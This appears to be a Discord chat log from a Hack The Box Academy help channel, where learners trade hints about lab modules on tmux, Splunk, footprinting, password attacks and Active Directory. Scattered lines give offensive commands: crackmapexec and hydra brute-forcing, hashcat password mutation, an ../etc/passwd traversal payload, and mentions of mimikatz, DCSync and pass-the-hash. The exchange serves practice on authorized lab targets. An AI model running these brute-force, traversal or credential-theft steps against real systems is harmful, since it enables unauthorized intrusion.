I DM'ed you

Didn't ask you to, try running john with sudo

research on copy mode, thinks there is a video from ippsec about tmux

Oh I only DM'ed you so I wouldn't provide any spoilers

Yeah Watched it, i'm not sure whats going on but i follow his commands and they still are not working. I installed the HTB's suggested plugins in the doc module, those keys don't really work for logging either. Not sure what i'm doing wrong

probably you change some default key, check the ~/.tmux.conf file and this website https://tmuxcheatsheet.com/

Can I dm someone about the ColdFusion - Discovery & Enumeration section of the Attacking Common Applications module? I’ve literally tried everything including checking port 5500 via netstat after getting a shell…

So in the guide, spacebar starts the selection of copy mode. but spacebar only goes down a page for me.

Such a bummer cuz tmux really interests me but the logging and copying are kidna the things i really like about it.

Does anyone know a solution to the "there are no available instances" error?

try with "ctrl + Spacebar", that should highlight the text, then "alt+w" to copy on clipboard and finally "ctrl+b+]" to paste the data.

Message support

https://www.youtube.com/watch?v=Lqehvpe_djs&t=17s

Already tried this

The ctrl space bar was kinda working. It looked like it was selecting, tried to copy and paste into obsidian but didn't work.

Thanks though

lol, you can not use copy mode on tmux to copy data inside tmux to programs outside tmux, like web browser, obisidan, notepad, etc.

Well then theres the problem lol

how does one take notes?

Open text editor, paste, save, copy from text file to obsidian

put this on your tmux config

set-option -g mouse off

then you should be able to use the mouse to copy paste
or run this inside a tmux session

tmux set-option -g mouse off

This works but again, I cant scroll up as i'm selecting so I can only copy what in plane view

I have been going through the CDSA modules

Specially, section "Introduction To Splunk & SPL"

I got stuck in the last question of the section "Find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. "

I have tried multiple SPL queries. However, non has sufficed.

Can anyone refer to me a detailed documentation about SPL range() function usage on time or duration?!

https://docs.splunk.com/Documentation/SCS/current/SearchReference/Aggregatefunctions

Range is equal to max() - min()

Thanks @acoustic owl . But I have tried this reference. It is not elaborate enough. I am trying to use it in time.

Hypothetically, the first occurrence of an event plus an specified duration afterwards.

Exactly, so if you use range(_time), you have determined the duration between max(_time) and min(_time)

if you're using x11 and xclip, you can pipe the copy mode buffer into xclip clipboard, and if you're using vmware, it reads from the primary xclip clipboard, so if you pipe the buffer into both clipboards, you'll be able to sync tmux buffer with the clipboard of both your guest and host OS

for static data it can work. However, I wanted to compute the number events from the first occurrence of the event by an account name and 5 minutes afterwards. The range shall pinpoint to any record that satisfies that selection and count it.

https://superuser.com/questions/537470/tmux-mouse-select-and-scroll-at-the-same-time

# Sane scrolling
set -g terminal-overrides 'xterm*:smcup@:rmcup@'

Yes, you can do exactly that

Hello
i have stuck in Threat hunting skills assessment First Hunt "i write the qeury and i found 2 hits" but the answer still wrong :\ any help please?

I will try then. A lot of thoughts are going through my heading including using eval and then range(). Thanks pal.

Hi, Can you please be more specific or add more details about the section and related question and the ways you have tried?

Threat Hunting & Hunting With Elastic

can i share the query ?

I am not sure if that is allowed or not.

However, you can go through this reference https://attack.mitre.org/techniques/T1570/

Take a close look at the hint, it suggests the usage of a tool that starts with "r"

"Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB/Windows Admin Shares to connected network shares or with authenticated connections via Remote Desktop Protocol." From Mitre ATT&CK T1570

Cross-check that with "Procedure Examples" that follow

Hi there, anyone can help me with the Skills Assessment of "JavaScript Deobfuscation"?. I'm stuck on question 3, I can see the contents of the variable flag but don't know how to stich it together to geht the right answer. Thank you guys in advance.

Throw it in a deobfuscator. If it doesn't work, throw it in another one. That's the entire idea behind that awful module.

got it, thank you!

.

You can't use this tool 'crackmapexec smb <ip> -u "user" -p "password" --shares' if there is no smb ports(135,445) on your remote target right?

For the Password attacks module, is it always better to just use mut_password.list over password.list as the default?(until explicitly stated otherwise)

Section:Attacking Common Applications
Module:Thick Client Application
"In order to capture the files, it is required to change the permissions of the Temp folder to disallow file deletions. To do this, we right-click the folder C:\Users\Matt\AppData\Local\Temp and under Properties -> Security -> Advanced -> cybervaca -> Disable inheritance -> Convert inherited permissions into explicit permissions on this object -> Edit -> Show advanced permissions, we deselect the Delete subfolders and files, and Delete checkboxes."
After starting a procmon, found a this folder, trying to change security permission, but there is not this option, could anyone hint me?

The permissions are changed within file explorer : |

the temp folder

I'm on the same module, next section: Exploiting Web Vulnerabilities in Thick-Client Applications. Are we supposed to compile Invoker.java from traverse or fatty-client-new?

u can try watch a fatty box from ippsec, i think this the same application

dope, thank you

you doing okey with the folder permissions?

well i found where i can change permissions, but maybe im selecting a wrong principal?

pricipal looks good

i had trouble selecting the correct folder

in the previous screen shows the folder you're editting

dm's are open

i have dm'd u

Hello all,

Similar to my last post regarding Footprinting Easy; I am doing the Footprinting Medium lab, and I have gotten the flag but I wanted to see if there was anything I missed. After ||Mounting the NFS directory and finding Alex's credentials|| I tried to connect to both the ||SMTP server with TELNET & CIFS(SMB) || I wasn't able to connect to the first which I kind of figured because I didn't see the port open but when I used the cred for the other service I just seemed like a dead end. Was there another way to enumerate these services did I pretty much cover all of my basis?

I only enumerated smb after mounting and used that to log in

I mounted the NFS share and was able to get some initial information from that I had just wanted to make sure that I didn't miss anything because SMB seemed like a dead end but another one of the open services gave me what I needed.

Smb was not a dead end for me

It had the important note

You can find that note another way

I actually found that ||Through the remote session||

Probably, just saying that I got it there

Yeah also possible

Did you use smbclient or rpcclient? If it's the former I might be using the wrong switches because I'm getting no information back, with the latter, I seemed to get blocked on every end.

First smbmap then smbclient

file inclusion prevention of file inclusion module i have edited php.ini file with a line to disable system() function then restart apache service then curl get request to the php file I made but when I check logs I don't seem to see any flag or what may be the answer it looks normals

can someone from admins may be check - is vulnerablesite.htb accessible from the bot side in Skills Assessment from ADVANCED XSS AND CSRF EXPLOITATION module?

so, i think something is broken. may be vulnerablesite.htb is not accessible for the bot

Hey, I have a problem with the modules section of Metasploit, when I try to exploit the vulnerabilities I get this error, I don't understand how to fix it

attacking common servies idk how to enumerate the user

i checked out blogs i couldnt find any users

i tried bruteforcing on login page and couldnt find any user

You may need to read the module again to find out how it works

can you please tell me wether i need to brueforce login page

or do i use wpscan

i also tried bruteforcing author id

i have no clue now help

use cme

if you use smb you have to create a smb share on your machine and use xcopy or robocopy

:(

If it is a Wordpress, wpscan is certainly the first choice

oh yea wpscan worked

i wonder why my loop didnt work

hello

i just wanna report a little typo mistake, where can i poste it 👀

#858470491676737536

#858470491676737536

thanx you :)

why does manually bruteforcing author id doesnt work

idk

wpscan tells you how it detected the authors

it has several methods to do it

it says it found by id bruteforcing

but when i try with a python script i dont get it

proxy the wpscan requests

and check with burp how are they getting done

Hello guys👋I'm new here and i'm in Finnish😅But i speak too English

Nice to meet you guys

What's your question

If you don't have a module question >>> #general

Oh, ok. Didn't see it at first. Going there. Thanks.

I'm having an issue getting the ZAP HUD to work correctly. I'm am not able to toggle on and off the break point. I have updated ZAP but it still doesn't work. I'm am working on the examples show in the HTB academy - Web Proxy Module. Any help would be appreciated. It doesn't respond when I click on it.

I got the ssh password for b.gates, but keep getting this error, "Permission denied (publickey).", when attempting to ssh b.gates@x.x.x.x. Module: Login Brute Forcing. Page: Service Authentication Brute Forcing. Question: Using what you learned in this section, try to brute force the SSH login of the user "b.gates" in the target server shown above. Then try to SSH into the server. You should find a flag in the home dir. What is the content of the flag?

Looks like you need an rsa key, are other services open?

Try attacking another service then

You're sending too many lines. Bot is treating it as spam

not doubting you, but if the question is asking to SSH into the server surely you would go that route?

That's the last step, ssh says (publickey) in its denial

For some reason, I can't paste the nmap output. Some of the open ports are 19 chargen, 22 ssh, 25 smtp, 4240 vrml-multi-use, and a long list of other "unknown" ports

thanks

gotcha

Try smtp

hacking wordpress skill assesment
I don't get how should i change /etc/hosts so that the ip would be resolved, cause when i add inlanefreight.com it does not help at all, just confuses with the real publicly faced web https://www.inlanefreight.com/i

enumerate more

I had no luck with smtp so far. For example, I used telnet x.x.x.x 25;USER b.gates but got "Trying x.x.x.x ..." as the result. I also substituted USER, for VRFY and EXPN but was not able to connect. I'll be back later and will try connecting to ssh again. Thanks

AH got it, had an issue with my vpn. used two vpns

Yeah, I've had similar issues like that in the past. I tried switching the HTB vpn to tcp, udp. I've also played around with my non-htb vpn's protocol as well

You'll get the cubes after completing

Up to you dude

whatever works for you tbh ¯_(ツ)_/¯

If its any use to you I was on silver subscription doing the pentest pathway and I ran out of cubes and needed to bump them up

Yes, an annual subscription unlocks all modules without cubes. You will receive cubes for each module you complete. So after a year you will have collected a few cubes.

I've just switched to the annual sub for that reason of unlocking them all

actually in need of a hint. the web does not run wordpress, i am supposed to find another domain, but looked up the whole site and went through gobuster for hidden links, not yet successful

Is it not meant to be http:

As opposed to https://

you said another domain

did you enumerate another domains under the one gave to you

just don't get how to find em

it’s taught in the ffuf module

also look in the source code

just enumerate better

I'm doing the Getting Started Module: Public Exploits right now, and I've already answered the question and all, with some internet help

Just trying to rationalize how you were supposed to arrive at the solution

Question: Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

After using nmap on the target (nmap -sV targetIP -Pn), I found that there's three port open, none of which I could exploit via msfconsole or extract some context clues from . The three services I've identified were ssh, tcpwreapped, and tcpwrapped from ports 22, 554, and 7070 respectively

Afterwards, I opened the target site on a web browser and found it explicitly uses WP simple backup plugin, to which I exploited via msfconsole, and later got the flag as a result

Was this how you were supposed to go about this module? Was there any point of doing an nmap scan, when I could've just opened the site?

nmap then should detect the port 80

80 and 443 usually runs websites

latter is encrypted traffic the former no

Can someone help me terminate a machine? it says its runnning but nowhere can I stop it

hello there, anyone so kind to help me in the questions for the password attack module in the PtT from windows section they ask for the number or TGT, so what i dud is using rudeus i export all the tikets usidng the option dump, now the question is the only TGT tickets are the ones that have the krbtgt on the service field or there is other way to identify them?

Yes you're meant to exploit the plug in

I believe this one launches a public server not private

So you'd do http://ip:port

Anytime it's not a private IP assume web

the point is his nmap didn’t show 80

So was portscanning just not useful for trying to exploit this site?

And it was lucky that I happened upon a website (though intentional for this lesson) that was explicitly telling me what plugin it was using, which could be exploited?

ahh its a docker

then don’t run nmap

Whenever given ip:port. Assume it's a web, and it's set up to give you the hint right away

you were not lucky

the module teaches you that its a website

It's not "luck" so to speak, it's just the way this exercise was set up

just follow it

you are NOT meant to portscan

this exercise

Oh, i thought Try to identify the services running on the server above called for doing a portscan

Eh it can be done by simply identifying that the ip is public

would any one mind point me in the right direction in order to find the credentials in Q5 on the Active Directory Skills Assessment Part 1 at all please. Its been doing my head in for the last couple of hours I just can't seem to find it

So using a username list and using a password list doesn't work? I asked the question in chatgpt and it said it was okay to use a username list or password list ...but I am not sure now.

Capital U and capital P

Can someone help me out, i cant temrinate a machine, but the machine is not even running

so im rendered useless now I cant do a single acitvity

Becuase of a ghost machine

Message support

Module: attacking common services easy mysql. I have the username and password I just need some help loging in to MySQL

You have to do it from inside the machine

RDP

Oh wait nvm you can just do -u<username> -p<password> $ip

You can drop the @ domain from the username

Thanks I'll give it a go!

Hi, I am going through the Web Attacks module but Burp Suite and the web browser does not seem to be playing ball, on Burp Suite I cant use anything other than the get http method and in the browser it just seems to constantly be loading, tried this on the first 2 exercises but no luck whatsover, anyone else experience this?

I have tried both my VM and the HTB Instance and still the same

@fathom pendant It worked thank you!

With intruder active you need to forward the request

Ok, do I need to send to Intruder or just have intruder active?

If intruder is active you just need to click forward or next on the burp interface

You must do file open and file delete

Thanks @fathom pendant

finally finished AD Enumeration & Attacks - Skills Assessment Part I. I do have a question remaining. At first i made a reverse tcp meterpreter shell and then I used evilwinrm, however all the tools did not want to connect to the DC to get the information I needed, when i did it through the webshell it worked. can someone explain why my first route did not work and my 2nd did.

You'd need to supply the exact commands and process you took as it could be as simple as a command issue etc. Put them in spoiler tags

|| i have made a meterpreter shell from which I obtained a hash for the administrator account. I then used evil winrm account admin:passthehash to enter the 1st machine. I tried minikatz which ended up in a loop showing minikatz: ; I tried rubeus to obtain information, constantly getting errors that it could not find the Domain. I tried powerview to do it manually, same results only getting connection errors. After this I thought it was the machine I was working on so I made a proxychain to go to the 172.16.6.1 network and connected to the 50 machine with the same admin:hash combination, this connection was far to unstable to even do something apart from dumping lsass.
Then I used the webshell to run rubeus and suddenly all the answers were shown and no connection issues. ||

Is anyone here doing the SOC Analyst job role path?

I'm stuck on a module section and would love a bit of assistance

Just ask your question

https://dontasktoask.com https://nohello.net

Finally got it! ssh b.gates@x.x.x.x -pport_number_of_htb_target. Thanks

It's regarding SilkETW - is it supposed to terminate on it's own after it had collected all of the traces? Mine has been running for at least 20 minutes and has currently captured 1628, but it does keep incrementally going up. I'm assuming this is what's keeping the etw.json file from having the method name I'm looking for.

@wraith spoke do you mind if I DM you about part 1 at all?

Hello, I'm currently on Nmap enumeration Medium lab, and I have to find the DNS server version, but I have little to no clue how to go about finding that. I tried all of the DNS resolution options and I think I'm missing sometihng crucial. Would anyone be kind enough to either walk me through how to figure it our or help me?

Any recommended modules on HTB Academy to prep for CEH.

Finished the Footprinting module!

Did you figure out this challenge? I am stuck on the same challenge. I am not even sure if I am interpreting the question correctly.

i was doing Local File Inclusion (LFI) module

and idky but cmds are not working

any help?

Yeah I eventually did.. you have to do some tracing back and understanding child-parent processes

hello, wym cmds are not working ?

it was suppose to return in "history" section, but it isn't

have you tried this one : ../../../etc/passwd ?

yeps, didnt work

Hi, I am stuck at question 3 of CDSA Introduction To Splunk & SPL. I have tried using range() function with time. I have converted to epoch time and added 10 minutes to get the range.

try adding more "../"

However, it has not sufficed yet

ugh, worked. thankyou

The standard is using like 5 ../

you welcome !
have fun this course is quite hard for a beginner but don't give up !

Hello everyone

thankyou

noted

Hello everyone!
Please I need some help
I've been getting strugle with a command in this module

#Module: Linux File Transfer Methods

It's about the scp command
I already have ssh running on my local machine

But in the remote machine I fail with this command

And on my local machine it works

Btw the passwd is correct when I write it but it says that is wrong 😦

index="main" sourcetype="WinEventLog:Security" EventCode=4624
| eval startTime=_time
| eval endTime=startTime+600
| stats count by startTime, endTime, Account_Name
| stats range(endTime, startTime) by count, Account_Name

can anyone help?!

0.0.0.0

you're scp into the wrong system

You should be doing your username@tun0ip also the order goes source -> destination so if you're copying from the target you would do that local file to your destination file

It may not be that issue though. After doing the Seatbelt attack, my Sysmon doesn’t show any event 7s (I did change the ImageLoad to “exclude” in the XML). I’ve been stuck in this section (Tapping into ETW, Windows Event Logs mini module) since last night and I don’t know what I’m doing wrong

How long did it take any of yall to complete the password attack path?

~5 hours give or take

Five hours without stopping?

Give or take yeah

Took some time while waiting to eat do some extra stuff

For the credential hunting in Linux section, there doesn't seem to be a way to access the lab machine. How does initial access work? The windows version had RDP creds.

First find another user and password combination: then look for will using the specified tool

There's no initial creds though to start the lab.

Read the first few words of my reply

That's the important bit, use the resources from the resources.zip the module gives you

And the mutated password list

So brute force with SSH using these?

I'm confused

hi how u solve this ?

Bruteforce a different service

Ssh is end goal not start

If you Nmap the target you'll see multiple ports open, don't just assume ONLY ssh is open, as the tools provided by the module are slow at bruteforcing ssh and will literally take hours

yeah, that's way too long

SMB didn't work though

The lab isn't compatible with V1

There's other ports

[ERROR] target smb://<IP>:445/ does not support SMBv1

I tried 139, same thing!

So that leaves FTP, which I'll try, but I'm not sure because it wasn't covered in the network services portion. I'm just trying hydra with it anyway.

Well if you ran an Nmap scan you'd know what ports are open

Shows 1:17 for time to complete

I did

You can upgrade the threads

Using -t n

am I on the right track with ftp though? That's the last port from my nmap scan besides the ones I've tried

Just be patient

That's the second lesson of this module is patience

I just want to make sure I'm on the right track before I waste an hour. I'll keep reading ahead while that runs I guess.

Thank you for the clarification.

It didn't say anything about initial creds so I was confused given the windows version of this module supplied RDP creds.

Sometimes in an engagement you aren't given initial creds

Also this module reuses the same labs so you can definitely narrow your search down quickly if you do some quick enumeration techniques after one of the earlier sections

Okay, so I tried FTP and SSH with the information supplied in the hint and have still found 0 valid passwords with Hydra. I feel like I'm spinning my wheels.

gonna say skill issue on this one

Just found it, I put the hint username in lowercase too and tried again.

Well yeah

It's a linux machine

Yeah, I was looking at the hint and didn't think about that when I was putting it in a wordlist as the only word for usernames.list

Then I named it the username in the hint in lowercase .list, lol

I'd suggest taking a look at /home/ so you can get a username list for the Linux machines 😉

Turns out I had just done the password list in my first try with FTP and 64 threads. When I tried the mutated list this is what I got

Same methodology for the Windows C:\users\

188:40h is CRAZY! lol

I get patience is one of the points but that is wild.

Why are you running it against ssh

That was FTP

That's weird. Sounds like connection fuckiness

What's it supposed to be, like 20 min?

<1hr

Yeah, glad I used the clue, that's excessive just to start a lab

I appreciate all of your help!

Also what fuckin wordlist are you using

Rockyou?

hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

from the "resources"

Are you using a list, even after being given a user?

mutated password list using the password list and custom ruleset from the resources in the lesson

I meant for the username

Ya goon

I was using the username list from the resources

I only got the user from the clue

The hint gives you a username to use

Just use that to save time

Yeah I realize now, clue < 10 min, while no clue = 188 hours, lol

They should just give that as a standard, not a clue.

It's a lesson in engagement

One of the ways to narrow down the list is log in as Sam and check /home/ for other usernames

Also SAVE all passwords you find :)

So that's what you're saying in terms of enumeration from previous lessons?

I didn't realize the sessions were linked, the last one I did was windows.

Yes the windows sessions are linked. And the Linux sessions are linked

what module: FOOTPRINTING
which part: IPMI
Question: I got the hash for the password of the user finally, but I was stuck for a while when I used the ?1?1?1?1?1?1?1?1, can someone please answer how do we know when is the time to use it? Thanks

Don't use that mask

That mask is for a specific ipmi type

thanks @fathom pendant . i got the flag but i want to know when is the time to use it. i didnt understand from the module content on when to use.

The module explicitly tells you the conditions to use it

"In the event of an HP iLO using default password"

got it. so from the msfconsole output would you be able to identify if it was HP iLO to then crack it?

Yes

hi im stuck on Windows privilage escalation section SeDebugPrivilege

i try psgetsys.ps1 but get error

Exception calling "CreateProcessFromParent" with "3" argument(s): "Not all privileges or groups referenced are
assigned to the caller"

any hint to solve this issue ?

Hello Peeps, I am right now at footprinting - lab easy, is about information gathering and stuff, and it's hinted that with this info I should find how to access the server via ssh, so far I believe I downloaded the correct files from the FTP server, but I don't know what do to with this 🤣

I just wanna know a hint of what are supposed to be the next steps.

reacone

It does not look like you have found the right files. Either you didn't show them in the screenshot, or you haven't found them yet.

Hello guys! I am in Password Attacks - Credential Hunting in Windows content

Try to use FindStr /SIM /C: "PASS" *.txt *.ini *.cfg *.config *.xml *.git *.s1 *.yml and Start Lazagne.exe all command

No problem was found: What is the default password of every needed inlanefreight domain user account?

Am I on the right path? Please give me some tips

hey guys can you plz help me with footprinting module - footprinting medium lab .. i have already found administrator creds but not able to get the flag plz guid me a little

Mssql

does not seems to connect to

throws the error of 111 repeatedly

Send screenshots

can i dm you once i have acess to my laptop

You can just send pics here

ok sure

And you’re admin?

yes

yes

I just rdp to administrator with the creds found, then opened mssql, had no issues

i dont know first it was throwing error when i rdp with xfreerdp so i tried with remmina and now when i connect to mssql it is giving me this error

Not for me

and also i tried with msslqclient.py it throws me the error 111 and refused connection

Are you the user administrator?

yes i am

i login as the alex and now gained adim creds in a file

Reset the box perhaps

After you reset just rdp to administrator with the pass from the important file

And try opening mssql again

already did it couple of times .. is it a technical issues i am doing something wrong

okay thanks for your time mate

i cant even connect with rdesktop or xfreerdp for user alex in footprinting medium

keep getting error

[04:53:23:233] [305625:305626] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0
[04:53:23:233] [305625:305626] [WARN][com.freerdp.crypto] - CN = WINMEDIUM

@south glen i was able to re-create your issue, if this what you do change the Authentication back to Windows Authentication

you may want to put that username in spoiler tag and try this (with the single quote for the pass)

xfreerdp /cert:ignore /dynamic-resolution /v:IP /u:(username)/p:'(password)'

hint powershell (and maybe you don't add users 1 by 1 as a sys admin)

Hi, Anyone recently completed Attacking Enterprise module? On the Web section where I need to get the flag from gitlab, I'm not able to get the site even when adding entry into my /etc/hosts , nothing works, if I use other ports then it redirects to other subdomain

Hello

I have a problem with this exercice

When I run my program I do not have access to my paylaod

can you help me? please

as much for me I have access with the pwn machine but not with my personal machine

Hello there, im trying to connect from windows to my linux(smbserver.py) i have configured everything, but when trying to net use there is an error

You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.
does anyone know how to bypass it?

Hi in the password mutation section of password attack module I am stuck in the mutated password list I generated a password list with the custom rule and password.list provided in the section but it takes a lot of time and even then I am not getting any answers. am I doing someting wrong if so please nudge me in the right direction

Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer. 

The commands I used are

To generate a password list I did

hashcat --force password.list -r custom.rule | sort -u > mut_pass.list

for the attack I used crackmapexec

crackmapexec ssh 10.129.x.x -u sam -p mut_pass.list

can someone suggest wordlist for this pls, i tried metasploit dont but it didnt get any hits

Yup, that module loves wasting your time. But you can speed it up by doing enumeration and trying to attack different services. Some are faster than others. Also play around with the tasks flag -t.

try hydra instead of metasploit

btw there is a ftp server

yes

i need wordlist

(sorry, that flag was for hydra, not crackmapexec)

i even tried writing my own script

it tries to log in correct but the wordlist is not right

ok I will try ftp on it

:c

any idea how to only display the valid cred on crackmapexec?

save output to a file and grep +

ok

--export file.name is the flag right?

yeap

i need wordlist :c

rockyou and darkweb2017 should come with kali

but i dont even know the username

i dont think tomcat needs that much wordlists

what module is that?

attacking common application

-> attacking tomcat

the password is not in the wordlist you used, use a bigger wordlist

how about usernames

use the same wordlists as the example

okay thanks i will give it a try

can you tell the wordlist pls i tried with various ones but my internet is bad and i cant hit one

same as the ones used in the example

/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt

but that didnt hit

understand the material and use some analytical thinking

can you please eloborate

it says to bruteforce on manager so im bruteforcing /manager/html

did i mistake anything

@quick crane you dont even have to output to a file you can just pipe straight into grep crackmapexec <command> | grep +

Hello there, im trying to connect from windows to my linux(smbserver.py) i have configured everything, but when trying to net use there is an error

You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.

does anyone know how to bypass it?

im still stuck it in ow

:c

help

use credentials

hi everyone! i'm stuck in the "Shellcoding tools" chapter of the Intro to assembly language module. I've no idea where to go in the Q. The above server simulates an exploitable server you can execute shellcodes on. Use one of the tools to generate a shellcode that prints the content of '/flag.txt', then connect to the sever with "nc SERVER_IP PORT" to send the shellcode.... Furthermore... In the examples brought in the text, always sets the root after a shellcode, but in my case, just my user (htb-studentxx). Any guidance? any help, please!!!! Thxs!!!!

The module explains exactly what you need to do.

use one of the tools in the exercise to generate a shellcode to get the flag, then send it using nc. not sure what you're referring to in the last part

i tried everything i can 😭

i tried metasploit, given script, my own script on different endpoints /manager/html, /host-manager/html

nothing works

Restart the target and do exactly 1:1 what is explained in the module.

Module:Attack Common Application
Section:Exploiting Web Vulnerabilities in Thick-Client Applications
Trying to complete this section, done everything until downloading a fatty-server.jar, while editing a Invoker.java there was always a compliling error just because of some stupid things(i cannot edit this properly bcs there is no code editor or something like this), after that thought to upload a ligolo-ng and download a fatty-server and do it through vscode on my local machine, but i cannot even upload it(tried curl,wget,certutil,smbserver, also tried evil-winrm but it just froze) also rdp is always crashing, does anybody done this section? i need some help

NOTE:i cant change code though notepad bcs of this things /* */ in java

how did you do tomcat

just did everything that was in module, that wasnt hard

DM me if u want

you can mount a drive when connecting to rdp, check here https://manpages.ubuntu.com/manpages/focal/man1/xfreerdp.1.html if your rdp keep crashing, swich your vpn to tcp

I tried it but I am getting some log error

thank you

the box is broken, i got answer and when i tried the same with burp it failed but when i try again it logged in

is there some mechanism to block if i send too many requests ? or is the box just broken

I have no idea.
Back then, I did exactly what was written in the module and was able to answer the question without any problems.

That's why I also said restart the target

thankyou so much for your time you have been a great help mate .. 🙂

too vague, provide more information.

Module Introduction to Forensics
Section Rapid Triage Examination & Analysis Tools

Hello, I'm stuck with the last question of the section. I think I have identified the right process but I can't find his name

What have you already tried?

I found it, I always go too far

Doing Windows Priv Esc - Pillaging. Question" Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer". It will not accept the Administrator hash in any given format. Anyone had similar issues? Nevermind. EDIT!!! What a detrimental exercise embedding more backups with multiple versions of the needed files........

Module:Attacking Common Applications
Section:Exploiting Web Vulnerabilities in Thick-Client Applications
Cant undestand, did the same thing but there is an error, does anyone know something?

i dont know java at all

Look up walk-through for a box called fatty

he is doing from eclipse, but this is too long, but yeah it the only way i think

did you make sure to carry over the changes from the previous manipulation? I dont remember which step this is but I remember I had a lot of trouble on one because I used the base fatty-client and didnt carry over the initial modification when I did another step - nvm didnt read your error clearly sorry

Hello when I try to recover the files, error access not denied, what sould I do ? Please

Set it up with a username/password

Windows doesn't play well with unauth stuff

Also specify a filename in your move command

Hey guys I'm stuck on "Windows Privilege Escalation" ==>> "Other Files"

I'm trying to get Import-Module .\PSSQLite.psd1
but I get a massage I can't do it does anybody have an idea what's the problem ??
am I on the right track??

C:\tools

yes ...

And it's in there as .psd1?

And not .ps1?

I know I get an error massage ...

it's Import-Module .\PSSQLite.psd1

I mean this suppose to B the way, no?!

Hello everyone! Sorry if I'm off-topic.I want to gift two specific Modules as a present for a birthday. Is it possible to give modules as gift instead of a voucher of cubes?

No

so sad T_T

is it not the correct way??

what's the error you're getting?

"Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your
computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning
message. Do you want to run C:\Tools\PSSQLite\PSSQLite.psm1?
[D] Do not run [R] Run once [S] Suspend [?] Help (default is "D"):"

did you bypass execution policy

when I try to run the bypass it gives me an error

what's the error

Set-ExecutionPolicy : Windows PowerShell updated your execution policy successfully, but the setting is overridden by a
policy defined at a more specific scope. Due to the override, your shell will retain its current effective execution
policy of Unrestricted. Type "Get-ExecutionPolicy -List" to view your execution policy settings. For more information
please see "Get-Help Set-ExecutionPolicy".

Are you running powershell as admin?

Gift them a .edu email /s

hi

I can't run it as admin...

Anyone done Active Directory Enumeration and Attack recently?
I need a hand on the last 2 question of Skill assessment 2

you shouldn't need admin privs for the process scope, use the bypass command as per the exercise, if it doesn't work, reset the target and try again

by "use the bypass command as per the exercise" that U mean ||Set-ExecutionPolicy Bypass -Scope Process|| right?

yes

it's a sqlite db, you can also use strings or the sqlite3 client, or just cat it

yes but it need to B so simple
but it doesn't work driving me mad ...
maybe it's got 2 do with me location??
I don't know what els to do ...

I don't get what you mean, there are multiple ways to read a sqlite db other than using that powershell module

Not the right place to ask, read #welcome

I need a hand with Active Directory Enumeration and Attack Skill Assessment 2, Question 11.
I have used Bloodhound and can see that the user C*** has ||Generic All over Domain Admins, which has Generic All over DC01|| When I try to use mimikatz as C* on MS01 I can't enter the password as it skips over the password prompt.
Am I doing something wrong here?

Ask the actual question and say what you've done,put spoilers in spoilers tags. You will be more likely to get help that way.

Youre really close maybe initiate a different session

In a different way

I have tried with a netcat shell, but it results in the same thing

And trying to do a ||DCSync|| with powerview just fails with

at the first step

What's the exact question

Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

I cant seem to connect to DC01 or MS01 with the creds I found in the previous question...

Try a different session

Maybe search "session" on the modules pages to refresh your memory

In the Active Directory module or another one? I havent found anything yet 😕

In the AD module

Its all in there

Everything you need to do

I'm doing Footprinting Lab - Hard || I was able to find Tom's credentials, and SSH key using IMAP, and then SSH into the NIXHARD server|| from there I keep finding the hidden directories and subdirectories but nothing that's pointing me towards where I should go next. Can anyone provide a hint for the next step because I feel like I've hit a wall.

Check some of Tom's home files.

Still stuck🙁

Did you perhaps hint to ||Enter-PSSession|| ?

I’ve found the flag.

o

bro im i verified

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Do you guys prefer using the HTB virtual terminal or your own terminal?

if you got free plan use your own terminal

free plan?

i mean did you bought premium plan

Yeah copying and pasting content from the resources section to the clipboard is starting to annoy me . Thats why I ask

I am on the silvers plan

thats rank i guess

i mean do you pay any cash monthly into hackthebox

I prefer my own terminal and my own box, learning how to manage and control your machine is a good skill 🙂

oh yeah thats true

I already paid the annual payment to hackthebox academy and pay 20 dollars per month for just hack the box

hmm i see

You use oracle vm?

Managed to authenticate to ms01 as C** so I think that is progress

I am stuck still in the password mutation section.
I tried enumerating the smb service with rpcclient for users from which I got user ||sam||
I then used that same user and used bruteforce with
crackmapexec ftp 10.129.x.x -u ||sam|| -p mutated.list | grep +
got nothing I even tried smb option in crackmapexec and then I tried combining both the passwor.list and user.list into 1 list and then mutating password with hashcat and then bruteforcing both the ftp and the smb services. please I need help for my sanity

I use the base parrot instance and then just add things I use commonly and customize it to how I like it

ippsec has a good video about his vm and is a good place to start

I use pwnbox as my current location from the servers is far so footprinting takes more than 1hr for full scans

im i verified

not yet

how do i can see that

any help with this I am stuck on this stupid question
Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.

your username will be the same color as mine. To verify yourself you need to go to botcommands and type /verify

what tool are you going to use for brute force

oh

Tried both hydra and crackmapexec

did you got wordlist ?

also you know its case sensitive same as password and username

yes from the resources mutated it then using hashcat

hmm

username is mentioned in the question and just to be sure I found out user sam(mentioned in the question) using rpcclient

I have my notes from that module up which section was it shade

hmm

Module password attacks
section Password mutations

o i think this was right b4 I started screenshotting the exercise question and answer rip

uh i remember the forums being very helpful for this

and that this section was easily the most annoying of the 28 cpts modules lol

yes I am feeling it now stuck on it for 3 days I tried looking into the forums they said to enum ftp and I did just that

I am just sad at this point

